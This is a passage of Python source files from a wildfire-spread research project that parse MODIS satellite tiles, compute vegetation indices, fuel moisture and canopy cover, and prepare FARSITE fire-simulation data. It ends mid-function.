#computeStationsMemory(stations)
lat, lon = buildCoordinateGrid(stations,resolution=resolution)
measurements = getStationsMeasurements(stations,queryDateTime,timeRange)
speedX, speedY = getSpeedContours(measurements,lat,lon)
speedX_fig = uc.plotContourWithStates(lat,lon,speedX,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
speedY_fig = uc.plotContourWithStates(lat,lon,speedY,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
if case == 1:
stations = readPickleStations(filename=filename[0:-4]+'.pkl')
computeStationsMemory(stations)
elif case == 2:
stations = readPickleStations(filename=filename[0:-4]+'.pkl')
#computeStationsMemory(stations)
lat, lon = buildCoordinateGrid(stations,resolution=resolution)
lat_grid, lon_grid = np.meshgrid(lat, lon)
measurements = getStationsMeasurements(stations,queryDateTime,timeRange)
speedX, speedY = getSpeedContours(measurements,lat_grid,lon_grid)
speedX_fig = uc.plotContourWithStates(lat,lon,speedX,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
speedY_fig = uc.plotContourWithStates(lat,lon,speedY,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
```
#### File: datadriven-wildfire-spread/scripts/parse_modis_file.py
```python
import glob
import pyhdf.SD as phdf
import xml.etree.ElementTree as ET
import datetime as dt
from scipy.ndimage.interpolation import zoom
import numpy as np
import util_common as uc
import re
import sys
import math
import scipy.interpolate as scpi
def coordinatesFromTile(tile):
''' This function will return the longitude and latitude MODIS Level 3
tile coordinate from the tile name in the format 'h00v00'
'''
lon = int(tile[1:3])
lat = int(tile[4:])
return lat, lon
def loadGPolygon(file):
''' This function will return the corner latitude and longitudes from a
MODIS Level 3 metadata xml file.
'''
tree = ET.parse(file)
root = tree.getroot()
ps = root[2][9][0][0][0]
p = []
for i in range(0,4):
p.append([float(ps[i][0].text),float(ps[i][1].text)])
return p
def loadXmlDate(file):
''' This function will return the start and end dates from a MODIS Level 3
metadata xml file.
'''
tree = ET.parse(file)
root = tree.getroot()
DT = root[2][8]
fmt = '%Y-%m-%d-%H:%M:%S'
enddate = DT[1].text+'-'+DT[0].text.split('.')[0]
startdate = DT[3].text+'-'+DT[2].text.split('.')[0]
enddate = dt.datetime.strptime(enddate,fmt)
startdate = dt.datetime.strptime(startdate,fmt)
return startdate, enddate
def arrangeGPolygon(p,topleft=1,topright=2,botleft=0,botright=3):
''' This function will rearrange GPolygon points into a human readable
format.
'''
plat = np.array([[p[topleft][1],p[topright][1]],[p[botleft][1],p[botright][1]]])
plon = np.array([[p[topleft][0],p[topright][0]],[p[botleft][0],p[botright][0]]])
return plat, plon
def interpGPolygon(plat,plon,pixels=1200):
''' This function will interpolate the 2x2 coordinate matrices to
pixel x pixel matrices using bilinear interpolation. Note, this function
should not be used with MODIS Level 3 data as the grid is non-linear. Use
invertModisTile instead.
'''
lat = zoom(plat,pixels/2,order=1)
lon = zoom(plon,pixels/2,order=1)
return lat, lon
def loadSdsData(file,sdsname):
''' This function will open an hdf4 file and return the data stored in
the sdsname attribute.
'''
f = phdf.SD(file,phdf.SDC.READ)
sds_obj = f.select(sdsname)
data = sds_obj.get()
return data
def returnDataFile(file):
f = phdf.SD(file,phdf.SDC.READ)
return f
def findXmlTimes(datadir,tiles):
''' This function finds the start and end times of each .hdf.xml file
in datadir within the first tile.
'''
files = glob.glob(datadir+'*'+tiles[0]+'*'+'.hdf')
startdates = []
enddates = []
for file in files:
startdate, enddate = loadXmlDate(file+'.xml')
startdates.append(startdate)
enddates.append(enddate)
return [startdates, enddates], files
def findQueryDateTime(files,dates,queryDateTime):
''' findQueryDateTime: This function takes a list containing start and end
datetimes returns the index of the list which contains a queryDateTime.
If no match is found, returns None.
Using timedeltas from datetime.datetime would have been better.
Unfortunately, that gave an error when the day was the same and the hour
difference was negative since the negative was stored in the day part of
the structure.
'''
index = None
queryDay = queryDateTime.timetuple().tm_yday+((queryDateTime.hour*60+queryDateTime.minute)*60+queryDateTime.second)/(24*60*60)
for i in range(0,len(dates[0])):
lowYearDiff = queryDateTime.year-dates[0][i].year
highYearDiff = dates[1][i].year-queryDateTime.year
lowDay = dates[0][i].timetuple().tm_yday+((dates[0][i].hour*60+dates[0][i].minute)*60+dates[0][i].second)/(24*60*60)
highDay = dates[1][i].timetuple().tm_yday+((dates[1][i].hour*60+dates[1][i].minute)*60+dates[1][i].second)/(24*60*60)
if lowYearDiff < 0:
lowDay = 367
elif lowYearDiff > 0:
lowDay = lowDay-uc.daysInYear(dates[0][i].year)
if highYearDiff < 0:
highDay = 0
elif highYearDiff > 0:
highDay = highDay+uc.daysInYear(dates[0][i].year-1)
if queryDay >= lowDay and queryDay <= highDay:
index = i
#print(dates[0][i],dates[1][i])
if index is not None:
tile = extractTileFromFile(files[index])
datename = files[index].split(tile)[0][-8:-1]
else:
print("Did not find queryDateTime.")
datename = None
return datename
def removeUnlistedTilesFromFiles(datadir,datename,tiles,use_all=False):
''' This will remove tiles which were not included in the list from the
list of files. If the use_all argument is active, it will instead
update the list of tiles to include all files found in the file names.
'''
files = glob.glob(datadir+'*'+datename+'*'+'.hdf')
if use_all:
tiles = findAllTilesFromFiles(files)
updated_files = []
for file in files:
use_file = False
for tile in tiles:
if tile in file:
use_file = True
if use_file:
updated_files.append(file)
return updated_files, tiles
def extractTileFromFile(file):
''' This function uses regular expressions to find .h00v00. in a filename
to extract the MODIS tile.
'''
m = re.search(r'\.h\d\dv\d\d\.',file)
tile = m.group(0)[1:-1]
return tile
def findAllTilesFromFiles(files):
''' This function finds all MODIS tiles in a list of file names
'''
tiles = []
for file in files:
tile = extractTileFromFile(file)
tiles.append(tile)
return list(set(tiles))
def findAllTilesFromDir(datadir):
''' This function finds all MODIS tiles in a list of file names
'''
files = glob.glob(datadir+'*.hdf')
tiles = []
for file in files:
tile = extractTileFromFile(file)
tiles.append(tile)
return list(set(tiles))
def activeFireDayIndex(dates,queryDateTime):
''' This function finds the index of the queryDateTime within the range
of dates of the (.hdf) file.
'''
index = None
queryDay = queryDateTime.timetuple().tm_yday
lowDay = dates[0].timetuple().tm_yday
highDay = dates[1].timetuple().tm_yday
lowYearDiff = queryDateTime.year-dates[0].year
highYearDiff = dates[1].year-queryDateTime.year
if lowYearDiff == 0:
index = queryDay-lowDay
elif highYearDiff == 0:
index = 8-(highDay-queryDay)
else:
print("Is query within range for the file?")
return index
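# Hedged example (illustrative only): for an 8-day granule whose start and end
# dates fall in the same year as the query, a file starting on day-of-year 185
# queried on day 187 gives index 187 - 185 = 2.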
def invertModisTile(tile,pixels=1200):
''' This function will create a pixel x pixel matrix for latitude and
longitude using the tile name. This algorithm is presented in the
Active Fire Index User Guide.
'''
R=6371007.181
T=1111950
xmin=-20015109
ymax=10007555
w=T/pixels
lat_lnsp = np.linspace(0,pixels-1,pixels)
lon_lnsp = np.linspace(0,pixels-1,pixels)
lon_grid, lat_grid = np.meshgrid(lon_lnsp,lat_lnsp)
H = float(tile[1:3])
V = float(tile[4:])
lat = (ymax-(lat_grid+0.5)*w-V*T)/R*(180/math.pi)
lon = ((lon_grid+0.5)*w+H*T+xmin)/(R*np.cos(lat/180*math.pi))*(180/math.pi)
return lat, lon
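# Hedged example (illustrative only): invertModisTile('h08v05') returns two
# 1200 x 1200 arrays holding the latitude and longitude of every pixel of that
# sinusoidal tile, derived from the horizontal index H=8 and vertical index V=5.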
def buildContour(files,queryDateTime,
sdsname='FireMask',
composite=True,
greedyMethod=False):
''' This function will combine measurements from multiple
MODIS tiles into a single dataset. The list of file names should
correspond to the same time and be for different tiles. The file names
should reference the (.hdf) files.
'''
#print(files[0])
pixels = loadSdsData(files[0],sdsname).shape[1]
tiles = findAllTilesFromFiles(files)
tiles_grid_dict, tiles_grid = uc.mapTileGrid(tiles,pixels,coordinatesFromTile)
tiles_data = tiles_grid.copy()
tiles_lat = tiles_grid.copy()
tiles_lon = tiles_grid.copy()
for file in files:
p = loadGPolygon(file+'.xml')
startdate, enddate = loadXmlDate(file+'.xml')
plat, plon = arrangeGPolygon(p)
if not composite:
day_index = activeFireDayIndex([startdate,enddate],queryDateTime)
data = loadSdsData(file,sdsname)
if day_index < data.shape[0]:
data = data[day_index,:,:]
else:
print("Required day index does not have data included.")
print("\tdata.shape:\t",data.shape)
print("\tday_index:\t",day_index)
data = None
else:
data = loadSdsData(file,sdsname)
tile = extractTileFromFile(file)
if greedyMethod:
lat, lon = interpGPolygon(plat,plon,pixels=pixels)
else:
lat, lon = invertModisTile(tile)
if data is not None:
tiles_data = uc.fillTileGrid(tiles_data,tiles_grid_dict,tile,data,pixels)
tiles_lat = uc.fillTileGrid(tiles_lat,tiles_grid_dict,tile,lat,pixels)
tiles_lon = uc.fillTileGrid(tiles_lon,tiles_grid_dict,tile,lon,pixels)
#tiles_lat = uc.fillEmptyCoordinates(tiles_lat,tiles,pixels,coordinatesFromTile)
#tiles_lon = uc.fillEmptyCoordinates(tiles_lon,tiles,pixels,coordinatesFromTile)
return tiles_lat, tiles_lon, tiles_data
def findQuerySdsData(queryDateTime,
datadir="G:/WildfireResearch/data/aqua_vegetation/",
tiles=['h08v04','h08v05','h09v04'],
composite=False,
use_all=False,
sdsname='1 km 16 days NDVI'):
''' This function will find the specified sdsname for each tile in tiles
within the datadir and find the closest to the queryDateTime. Matrices
of the latitude, longitude, and data are returned.
'''
# Arrange files and tiles
if tiles is None:
tiles = findAllTilesFromDir(datadir)
dates, files = findXmlTimes(datadir,tiles)
datename = findQueryDateTime(files,dates,queryDateTime)
files, tiles = removeUnlistedTilesFromFiles(datadir,datename,tiles,use_all=use_all)
# Load all tiles at the queryDateTime
lat,lon,data = buildContour(files,queryDateTime,sdsname=sdsname,composite=composite)
return lat, lon, data
def geolocateCandidates(lat,lon,data):
''' This function extracts latitude and longitude corresponding to points
in the binary mask data.
'''
r,c = np.where(data > 0)
pts = []
coords = []
for i in range(0,len(r)):
ptlat = lat[r[i],c[i]]
ptlon = lon[r[i],c[i]]
ptdat = data[r[i],c[i]]
pts.append([ptlat,ptlon,ptdat])
coords.append([r[i],c[i]])
coords = np.array(np.squeeze(coords),dtype=int)
pts = np.array(pts)
return pts, coords
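# Hedged usage sketch (illustrative only):
#   pts, coords = geolocateCandidates(af_lat, af_lon, data_mask)
# gives an N x 3 array of [latitude, longitude, value] for every nonzero pixel
# of data_mask, together with the matching N x 2 array of row/column indices.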
def compareCandidates(old_pts,new_pts,dist_thresh=0.5):
''' This function compares two sets of points to return minimum distance
to a point in the new_pts set from an old_pt. dist_thresh is the maximum
distance, in degrees, at which two points are considered a match.
NOTE: 1 degree is approximately 69 miles, or 111 km
NOTE: Modis resolution is approximately 1km
'''
matched_pts = []
if old_pts.shape[0] != 0 and new_pts.shape[0] != 0:
for i in range(0,old_pts.shape[0]):
squared = np.power(new_pts[:,0:2]-old_pts[i,0:2],2)
summed = np.sum(squared,axis=1)
rooted = np.power(summed,0.5)
min_dist = np.min(rooted)
if min_dist <= dist_thresh:
matched_pts.append([i,min_dist*111,np.argmin(rooted)])
matched_pts = np.array(matched_pts)
return matched_pts
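# Hedged usage sketch (illustrative only): comparing yesterday's detections to
# today's,
#   matched = compareCandidates(old_pts, new_pts, dist_thresh=0.5)
# returns one row per old point that has a new point within 0.5 degrees, as
# [old point index, distance in km, index of the nearest new point].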
def buildOneDayContour(files,sdsname='sur_refl_b01',targetPixels=1200):
pixels = loadSdsData(files[0],sdsname).shape[1]
zoomLevel = targetPixels/pixels
tiles = findAllTilesFromFiles(files)
tiles_grid_dict, tiles_grid = uc.mapTileGrid(tiles,targetPixels,coordinatesFromTile)
tiles_data = tiles_grid.copy()
tiles_lat = tiles_grid.copy()
tiles_lon = tiles_grid.copy()
for file in files:
data = loadSdsData(file,sdsname)
data = zoom(data,zoomLevel)
tile = extractTileFromFile(file)
lat, lon = invertModisTile(tile,pixels=targetPixels)
if data is not None:
tiles_data = uc.fillTileGrid(tiles_data,tiles_grid_dict,tile,data,targetPixels)
tiles_lat = uc.fillTileGrid(tiles_lat,tiles_grid_dict,tile,lat,targetPixels)
tiles_lon = uc.fillTileGrid(tiles_lon,tiles_grid_dict,tile,lon,targetPixels)
return tiles_lat, tiles_lon, tiles_data
def list2stats(datas,name=''):
dataMedian = np.median(datas,axis=0)
dataMean = np.nanmean(datas,axis=0)
dataMin = np.nanmin(datas,axis=0)
dataMax = np.nanmax(datas,axis=0)
uc.dumpPickle([dataMin,dataMax,dataMedian,dataMean],name)
return dataMin, dataMax, dataMedian, dataMean
def generateVegetationStats(datadir="G:/WildfireResearch/data/aqua_reflectance/",
outdir="E:/projects/wildfire-research/data-test/",
tiles=['h08v04','h08v05','h09v04']):
''' This function will store out images with the min, max, median, and mean
values of VIGR, NDVI, VARI, and NDI16. These are needed for moisture
content estimation.
'''
files = glob.glob(datadir+'*.hdf')
dates = []
for file in files:
dates.append(file.split("//")[1].split('.')[1])
dates = list(set(dates))
ndvis = []
varis = []
ndi16s = []
vigrs = []
for i in range(0,len(dates)):#date in dates:
date = dates[i]
files = glob.glob(datadir+'/*'+date+'*.hdf')
goodFiles = []
for file in files:
tileCheck = False
for tile in tiles:
if tile in file:
tileCheck = True
if tileCheck:
goodFiles.append(file)
lat,lon,rho1 = buildOneDayContour(goodFiles,sdsname='sur_refl_b01')
lat,lon,rho2 = buildOneDayContour(goodFiles,sdsname='sur_refl_b02')
lat,lon,rho3 = buildOneDayContour(goodFiles,sdsname='sur_refl_b03')
lat,lon,rho4 = buildOneDayContour(goodFiles,sdsname='sur_refl_b04')
lat,lon,rho6 = buildOneDayContour(goodFiles,sdsname='sur_refl_b06')
num_ndvi = np.array(rho2-rho1,dtype=np.float32)
den_ndvi = np.array(rho2+rho1,dtype=np.float32)
ndvi = np.zeros(num_ndvi.shape)
ndvi[den_ndvi > 0] = num_ndvi[den_ndvi > 0]/den_ndvi[den_ndvi > 0]
ndvis.append(ndvi)
num_vari = rho4-rho1
den_vari = rho4+rho1-rho3
vari = np.zeros(num_vari.shape)
vari[den_vari > 0] = num_vari[den_vari > 0]/den_vari[den_vari > 0]
varis.append(vari)
num_ndi16 = rho2-rho6
den_ndi16 = rho2+rho6
ndi16 = np.zeros(num_ndi16.shape)
ndi16[den_ndi16 > 0] = num_ndi16[den_ndi16 > 0]/den_ndi16[den_ndi16 > 0]
ndi16s.append(ndi16)
num_vigr = rho4-rho1
den_vigr = rho4+rho1
vigr = np.zeros(num_vigr.shape)
vigr[den_vigr > 0] = num_vigr[den_vigr > 0]/den_vigr[den_vigr > 0]
vigrs.append(vigr)
vigrMin, vigrMax, vigrMedian, vigrMean = list2stats(vigrs,name=outdir+'vigrStats2016.pkl')
ndviMin, ndviMax, ndviMedian, ndviMean = list2stats(ndvis,name=outdir+'ndviStats2016.pkl')
variMin, variMax, variMedian, variMean = list2stats(varis,name=outdir+'variStats2016.pkl')
ndi16Min, ndi16Max, ndi16Median, ndi16Mean = list2stats(ndi16s,name=outdir+'ndi16Stats2016.pkl')
uc.dumpPickle([dates,lat,lon,vigrs],outdir+'vigrAll.pkl')
uc.dumpPickle([dates,lat,lon,ndvis],outdir+'ndvisAll.pkl')
uc.dumpPickle([dates,lat,lon,varis],outdir+'varisAll.pkl')
uc.dumpPickle([dates,lat,lon,ndi16s],outdir+'ndi16sAll.pkl')
return dates, ndvis, varis, ndi16s, vigrs
def getLfmChap(vari,lfmLowerThresh=0,lfmUpperThresh=200,
vigrFile="E:/projects/wildfire-research/data-test/vigrStats2016.pkl"):
''' This function will return chaparral moisture estimation based on
VARI measurement.
'''
vigrMin, vigrMax, vigrMedian, vigrMean = uc.readPickle(vigrFile)
lfm = 97.8+471.6*vari-293.9*vigrMedian-816.2*vari*(vigrMax-vigrMin)
lfm[lfm<lfmLowerThresh] = lfmLowerThresh
lfm[lfm>lfmUpperThresh] = lfmUpperThresh
return lfm
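# Hedged note (illustrative only): the regression above estimates chaparral
# live fuel moisture (percent) as
#   LFM = 97.8 + 471.6*VARI - 293.9*VIGRmedian - 816.2*VARI*(VIGRmax - VIGRmin)
# with the result clipped to [lfmLowerThresh, lfmUpperThresh].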
def getLfmCss(vari,lfmLowerThresh=0,lfmUpperThresh=200,
ndi16File="E:/projects/wildfire-research/data-test/ndi16Stats2016.pkl",
ndviFile="E:/projects/wildfire-research/data-test/ndviStats2016.pkl"):
''' This function will return coastal ss moisture estimation based on
VARI measurement.
'''
ndi16Min, ndi16Max, ndi16Median, ndi16Mean = uc.readPickle(ndi16File)
ndviMin, ndviMax, ndviMedian, ndviMean = uc.readPickle(ndviFile)
lfm = 179.2 + 1413.9*vari-450.5*ndi16Median-1825.2*vari*(ndviMax-ndviMin)
lfm[lfm<lfmLowerThresh] = lfmLowerThresh
lfm[lfm>lfmUpperThresh] = lfmUpperThresh
return lfm
def buildCanopyData(datadir='G:/WildfireResearch/data/terra_canopy/',
outdir = "E:/projects/wildfire-research/data-test/",
sdsname='Percent_Tree_Cover',
outname='canopy.pkl'):
ds = 1
method='linear'
files = glob.glob(datadir+'/*.hdf')
#f = returnDataFile(files[0])
lat,lon,data = buildOneDayContour(files,sdsname=sdsname,targetPixels=1200)
data[lat==0] = np.nan
lat[lat == 0] = np.nan
lon[lon == 0] = np.nan
data[data > 100] = 100
lat = np.reshape(lat,(lat.shape[0]*lat.shape[1]))
lon = np.reshape(lon,(lon.shape[0]*lon.shape[1]))
values = np.reshape(data,(data.shape[0]*data.shape[1]))
inds = np.where(~np.isnan(lat) & ~np.isnan(lon) & ~np.isnan(values))
lat = lat[inds]
lon = lon[inds]
values = values[inds]
pts = np.zeros((len(lat),2))
pts[:,0] = lat
pts[:,1] = lon
newpts, sz = getCustomGrid(reshape=True)
remapped = scpi.griddata(pts[0::ds],values[0::ds],newpts,method=method)
data = np.reshape(remapped,(sz[0],sz[1]))
latitude, longitude = getCustomGrid(reshape=False)
uc.dumpPickle([latitude,longitude,data],outdir+outname)
return latitude, longitude, data
def getCustomGrid(lat_lmt = [30,44],
lon_lmt = [-126,-112],
pxPerDegree = 120,
ds=1,
method='nearest',
reshape=False):
''' This function will generate custom MODIS grid
'''
lat_lnsp = np.linspace(np.min(lat_lmt),np.max(lat_lmt),
(np.max(lat_lmt)-np.min(lat_lmt)+1)*pxPerDegree)
lon_lnsp = np.linspace(np.min(lon_lmt),np.max(lon_lmt),
(np.max(lon_lmt)-np.min(lon_lmt)+1)*pxPerDegree)
lon_grid, lat_grid = np.meshgrid(lon_lnsp,lat_lnsp)
if reshape:
lon_lnsp2 = np.reshape(lon_grid,(lon_grid.shape[0]*lon_grid.shape[1]))
lat_lnsp2 = np.reshape(lat_grid,(lat_grid.shape[0]*lat_grid.shape[1]))
newpts = np.zeros((len(lat_lnsp2),2))
newpts[:,0] = lat_lnsp2
newpts[:,1] = lon_lnsp2
sz = lat_grid.shape
return newpts, sz
else:
return lat_grid, lon_grid
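# Hedged worked example (illustrative only): with the default limits the grid
# spans (44 - 30 + 1) * 120 = 1800 latitude points by (-112 - (-126) + 1) * 120
# = 1800 longitude points over roughly California and its surroundings.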
if __name__ == '__main__':
''' case 0: loads modis vegetation index at queryDateTime and plots for
the whole United States
case 1: Loads modis active fires at queryDateTime and plots for
California
case 2: Loads modis vegetation index, active fires, and burned area
at queryDateTime for California.
case 3: Loads modis active fires at 365 consecutive queryDateTimes
and saves the results.
case 4: Loads stored VARI data and plots the chaparral live fuel
moisture estimate.
case 5: Builds the canopy cover dataset and plots it.
'''
# User inputs
queryDateTime = dt.datetime(year=2017,month=7,day=9,hour=6,minute=00)
case = 1
if case == 0:
tiles = None
states = 'All'
#Find vegetation index at queryDateTime
vi_lat,vi_lon,vi_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=True,
datadir="G:/WildfireResearch/data/aqua_vegetation/",
sdsname='1 km 16 days NDVI')
vi_fig = uc.plotContourWithStates(vi_lat,vi_lon,vi_data,states=states,label='VI')
vi_mem = (sys.getsizeof(vi_data)+sys.getsizeof(vi_lat)+sys.getsizeof(vi_lon))/1024**2
print("VI File Size: %.4f MB"%(vi_mem))
if case == 1:
tiles = ['h08v04','h08v05','h09v04']
states = 'California'
# Find activefires at queryDateTime
af_lat,af_lon,af_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=False,
datadir="G:/WildfireResearch/data/aqua_daily_activefires/",
sdsname='FireMask')
af_fig = uc.plotContourWithStates(af_lat,af_lon,af_data,states=states,
clim=np.linspace(0,9,10),label='AF',
xlim=[-121.5, -118.5], ylim=[33.5, 36.5], saveFig=True)
af_mem = (sys.getsizeof(af_data)+sys.getsizeof(af_lat)+sys.getsizeof(af_lon))/1024**2
print("AF File Size: %.4f MB"%(af_mem))
if case == 2:
tiles = ['h08v04','h08v05','h09v04']
states = 'California'
# Find activefires at queryDateTime
af_lat,af_lon,af_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=False,
datadir="G:/WildfireResearch/data/aqua_daily_activefires/",
sdsname='FireMask')
#Find vegetation index at queryDateTime
vi_lat,vi_lon,vi_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=True,
datadir="G:/WildfireResearch/data/aqua_vegetation/",
sdsname='1 km 16 days NDVI')
#Find burned area at queryDateTime
ba_lat,ba_lon,ba_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=True,
datadir="G:/WildfireResearch/data/modis_burnedarea/",
sdsname='burndate')
af_fig = uc.plotContourWithStates(af_lat,af_lon,af_data,states=states,
clim=np.linspace(0,9,10),label='AF')
vi_fig = uc.plotContourWithStates(vi_lat,vi_lon,vi_data,states=states,label='VI')
ba_fig = uc.plotContourWithStates(ba_lat,ba_lon,ba_data,states=states,label='BA')
vi_mem = (sys.getsizeof(vi_data)+sys.getsizeof(vi_lat)+sys.getsizeof(vi_lon))/1024**2
af_mem = (sys.getsizeof(af_data)+sys.getsizeof(af_lat)+sys.getsizeof(af_lon))/1024**2
ba_mem = (sys.getsizeof(ba_data)+sys.getsizeof(ba_lat)+sys.getsizeof(ba_lon))/1024**2
total_mem = vi_mem+af_mem+ba_mem
print("VI, AF, BA, Total File Size: %.4f,%.4f,%.4f,%.4f MB"%(vi_mem,af_mem,ba_mem,total_mem))
if case == 3:
tiles = ['h08v04','h08v05','h09v04']
states = 'California'
# Find activefires at queryDateTime
#queryDateTime = dt.datetime(year=2016,month=1,day=1,hour=12,minute=0)
outdir = 'E:\\projects\\forensics\\parkfield\\'
for i in range(0,365):
af_name = outdir+'AF2_'+queryDateTime.isoformat()[0:13]+'.png'
af_lat,af_lon,af_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=False,
datadir="G:/WildfireResearch/data/terra_daily_activefires/",
sdsname='FireMask')
if af_data is not None:
af_fig = uc.plotContourWithStates(af_lat,af_lon,af_data,states=states,
clim=np.linspace(0,9,10),label='AF',
saveFig=True,saveName=af_name)
af_mem = (sys.getsizeof(af_data)+sys.getsizeof(af_lat)+sys.getsizeof(af_lon))/1024**2
data_mask = af_data.copy()
data_mask[data_mask < 7] = 0
pts = geolocateCandidates(af_lat,af_lon,data_mask)
if i > 0:
match_pts = compareCandidates(old_pts,pts)
if match_pts.shape[0] > 0:
print("Time %s found %.0f matches with the closest %.4f km."%(queryDateTime.isoformat(),match_pts.shape[0],np.min(match_pts[:,1])))
else:
pass
queryDateTime = queryDateTime + dt.timedelta(days=1)
old_pts = pts
else:
old_pts = np.array([])
#print(match_pts)
print("AF File Size: %.4f MB"%(af_mem))
if case == 4:
datadir = "E:/projects/wildfire-research/data-test/"
dates, lat, lon, varis = uc.readPickle(datadir+'varisAll.pkl')
for i in range(0,1):#len(varis)):
lfm_chap = getLfmChap(varis[i])
#lfm_css = getLfmCss(varis[i])
uc.plotContourWithStates(lat,lon,lfm_chap,
clim=np.linspace(0,200,11))
#saveFig=True,saveName=datadir+"lfmCss_"+dates[i]+".png",)
if case == 5:
lat, lon, data = buildCanopyData()
uc.plotContourWithStates(lat,lon,data,clim=np.linspace(0,100,11))
"""
datadir = 'G:/WildfireResearch/data/terra_canopy/'
outdir = "E:/projects/wildfire-research/data-test/"
files = glob.glob(datadir+'/*.hdf')
#f = returnDataFile(files[0])
lat,lon,data = buildOneDayContour(files,sdsname='Percent_Tree_Cover',targetPixels=1200)
data[lat==0] = np.nan
lat[lat == 0] = np.nan
lon[lon == 0] = np.nan
data[data > 100] = 100
uc.plotContourWithStates(lat,lon,data,clim=np.linspace(0,100,11))
uc.dumpPickle([lat,lon,data],outdir+'canopy.pkl')
"""
```
#### File: datadriven-wildfire-spread/scripts/prepareFarsiteData.py
```python
import subprocess
import os
import behavePlus as bp
import numpy as np
import datetime
import queryLandFire as qlf
import geopandas as gpd
from shapely.geometry import Polygon, Point
import matplotlib.pyplot as plt
import rasterio
from rasterio import features
import rasterio.plot as rsplot
import math
import glob
import tensorflow as tf
import sys
import h5py
def convertVector(speed,direction):
''' This function will convert wind speed measurements from polar
coordinates to Cartesian coordinates.
'''
if direction == -1:
speedX = speed/(2**0.5)
speedY = speed/(2**0.5)
elif direction is None:
print("Wind direction was not set.")
speedX, speedY = np.nan, np.nan
elif speed is None:
print("Wind speed was not set.")
speedX, speedY = np.nan, np.nan
else:
try:
speedX = speed*np.sin(direction/180*math.pi)
speedY = speed*np.cos(direction/180*math.pi)
except:
assert False, "Unknown wind vector: %s Mps %s Deg" % (str(speed),str(direction))
return speedX, speedY
def plotWildfireData(datas,names,
clims=None,closeFig=None,
saveFig=False,saveName=''):
totalPlots = np.ceil(float(len(datas))**0.5)
colPlots = totalPlots
rowPlots = np.ceil((float(len(datas)))/colPlots)
currentPlot = 0
if saveFig:
fntsize = 20
lnwidth = 5
fig = plt.figure(figsize=(colPlots*12,rowPlots*10))#,tight_layout=True)
if closeFig is None:
closeFig = True
else:
fig = plt.figure(figsize=(colPlots*6,rowPlots*5))#,tight_layout=True)
fntsize = 20
lnwidth = 2
if closeFig is None:
closeFig = False
xmin = 0
xmax = datas[0].shape[1]
xticks = np.linspace(xmin,xmax,int(round((xmax-xmin)/10)+1))
ymin = 0
ymax = datas[0].shape[0]
yticks = np.linspace(ymin,ymax,int(round((ymax-ymin)/10)+1))
for i in range(0,len(names)):
key = names[i]
currentPlot = currentPlot+1
ax = fig.add_subplot(rowPlots,colPlots,currentPlot)
ax.tick_params(axis='both',labelsize=fntsize)
plt.xticks(xticks)
plt.yticks(yticks)
plt.title(key,fontsize=fntsize)
if clims is None:
clim = np.linspace(0,1,10)
label = ''
else:
clim = clims[i]
label = ''
img = ax.imshow(datas[i],cmap='jet',vmin=clim[0],vmax=clim[-1])#,vmin=0,vmax=1)
img_cb = plt.colorbar(img,ax=ax,label=label)
img_cb.set_label(label=label,fontsize=fntsize)
img_cb.ax.tick_params(axis='both',labelsize=fntsize)
ax.grid(linewidth=lnwidth/4,linestyle='-.',color='k')
for ln in ax.lines:
ln.set_linewidth(lnwidth)
if saveFig:
fig.savefig(saveName)
if closeFig:
plt.clf()
plt.close(fig)
def parseFarsiteInput(filename):
with open(filename,'r') as f:
lines = f.readlines()
moistures = []
weathers = []
winds = []
for line in lines:
if 'FUEL_MOISTURES_DATA' in line:
switch = 'moisture'
elif 'WEATHER_DATA' in line:
switch = 'weather'
elif 'WIND_DATA' in line:
switch = 'wind'
lineSplit = line.split(' ')
if lineSplit[0].isdigit():
lineArray = np.array([float(x) for x in lineSplit])
if switch == 'moisture':
moistures.append(lineArray)
elif switch == 'weather':
weathers.append(lineArray)
elif switch == 'wind':
winds.append(lineArray)
moistures = np.array(moistures)
weathers = np.array(weathers)
winds = np.array(winds)
return moistures, weathers, winds
def lineStringToPolygon(data):
    # Both branches of the original size check applied the same conversion, so a
    # single loop over all rows is equivalent.
    for i in range(0, data.shape[0]):
        data['geometry'][i] = Polygon(list(data['geometry'][i].coords))
    return data
def loadFarsiteOutput(namespace,commandFarsite=True):
#imgs, names, headers = qlf.readLcpFile(inDir+namespace+'.LCP')
#header = qlf.parseLcpHeader(headers)
dataOut = gpd.GeoDataFrame.from_file(namespace+'_out_Perimeters.shp')
if commandFarsite:
dataOut = lineStringToPolygon(dataOut)
testDate = [datetime.datetime(year=2016, month=int(x), day=int(y), hour=int(z)).timestamp() for x,y,z in zip(dataOut['Month'].values,dataOut['Day'].values,dataOut['Hour'].values/100)]
testDate = np.array(testDate,dtype=np.float32)
testDate = np.array((testDate-testDate[0])/3600,dtype=np.int16) #/3600
dataOut['time'] = testDate
#lcpData = rasterio.open(inDir+namespace+'.LCP')
return dataOut
def loadFarsiteLcp(lcpNamespace):
lcpData = rasterio.open(lcpNamespace)
return lcpData
def downsampleImage(img,interval):
newImg = img[::interval,::interval].copy()
return newImg
def plotTimeContour(img,imgBand,contours,namespace):
fs = 16
contours = contours.reindex(index=contours.index[::-1])
fig, ax = plt.subplots(figsize=(12,8))
rsplot.show((img,imgBand),with_bounds=True,ax=ax,cmap='gray')
vmin = np.min(contours.time)
vmax = np.max(contours.time)
contours.plot(ax=ax, cmap='jet', scheme='time')
sm = plt.cm.ScalarMappable(cmap='jet_r', norm=plt.Normalize(vmin=vmin,vmax=vmax))
sm._A = []
cbar = fig.colorbar(sm)
cbar.ax.set_ylabel('Time since Ignition (Hours)',rotation=270,fontsize=fs)
cbar.ax.get_yaxis().labelpad = 20
cbar.ax.tick_params(labelsize=fs)
cbar.ax.invert_yaxis()
plt.tick_params(labelsize=fs)
ax.ticklabel_format(axis='both', style='sci', scilimits=(-2,2))
plt.tight_layout()
plt.xlabel('NAD83 EW %s'%(ax.xaxis.offsetText.get_text()),fontsize=fs)
plt.ylabel('NAD83 NS %s'%(ax.yaxis.offsetText.get_text()),fontsize=fs)
ax.yaxis.offsetText.set_visible(False)
ax.xaxis.offsetText.set_visible(False)
plt.savefig(namespace)
return fig
def getRasterFromPolygon(data,tF,ind,value,sz):
outArr = np.zeros(sz)
